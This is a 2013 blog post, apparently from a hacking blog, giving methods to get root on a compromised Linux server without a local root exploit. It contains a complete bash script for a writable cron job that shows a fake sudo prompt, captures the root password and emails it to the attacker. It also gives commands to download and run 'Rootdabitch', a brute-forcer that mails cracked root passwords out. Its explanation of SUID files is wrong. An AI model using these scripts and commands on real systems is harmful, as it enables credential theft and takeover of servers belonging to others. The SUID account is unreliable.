Tuesday, September 24, 2013

Root server without local root exploit

Many hackers find it difficult to find a local root exploit for rooting the server. So here is few methods you could try to gain root acess without using a local root exploit!

1. Custom Cron Tab Scripts

Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.
First, check out if there are any Cron Job Tasks:
 crontab -l 
If you see any Custom Script, we must Check out if we can Write on it.
Let’s say we got a Custom script here: /bin/cronscript
To check if we can Write a File, type:
 stat /bin/cronscript 

 (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) 
Let’s edit the file and send a Fake Error Message.
Make a Copy of the Original Script to /bin/cronscript.bak :
 cp /bin/cronscript /bin/cronscript.bak 
Edit the /bin/cronscript like this:

 echo “An System Error Occured!” 

 echo “” 

 echo “Error Code: #131425″ 

 echo “” 

 echo “Update to get the Latest Patch for this Security Issue.” 

 read -s -p “[sudo] password for root ” rootpasswd 

 echo “” 

 echo “su: Authentication failure” 

 echo “” 

 sudo apt-get update && sudo apt-get upgrade 

 sudo echo “The Password is: $rootpasswd” > .kod 

 mail -s “Root’s Password” “  email@address.com  ” < .kod 

 rm .kod 

 mv  cronscript.bak cronscript 
You should just Replace the Underlined with your E-Mail and the Name of the Script!
After you save the File, type: chmod +x cronscript   to set it as Executable!
This script will:
- Send a Fake Error Message
- Request for the Root’s Password
- Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at the /bin )
- Restore the Original File

When the Script gets Executed, the Root User will Enter his Password and it will be send to you!
It would be better if you had some knowledge on Bash Programming…

2. Enumerating all SUID Files

An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you:   You can Escalate Priviliges in this way, if it is in an Important Directory.
you can Social-Engineer a Privileged User.
To find all SUID Files, type:
 find / -user root -perm -4000 -print 
This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!

3. Brute Forcing

I know what you are thinking after seeing the title, well this is different the tool we gonna use is called Rootdabitch
What is so special in this?
The magic about this tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :)
For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here Rootdabitch v0.1
./rootdabitch.sh youremail@site.com
For kiddies:
First download rootdabitch to the server:
wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
Extract it by the following cmd:
unzip rootdabitch-0.1.zip
Chmod it to 755:
chmod + x rootdabitch.sh
Finally run the script
./rootdabitch.sh youremail@site.com
Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail
Thats all have a gr8 day :)

No comments:

Post a Comment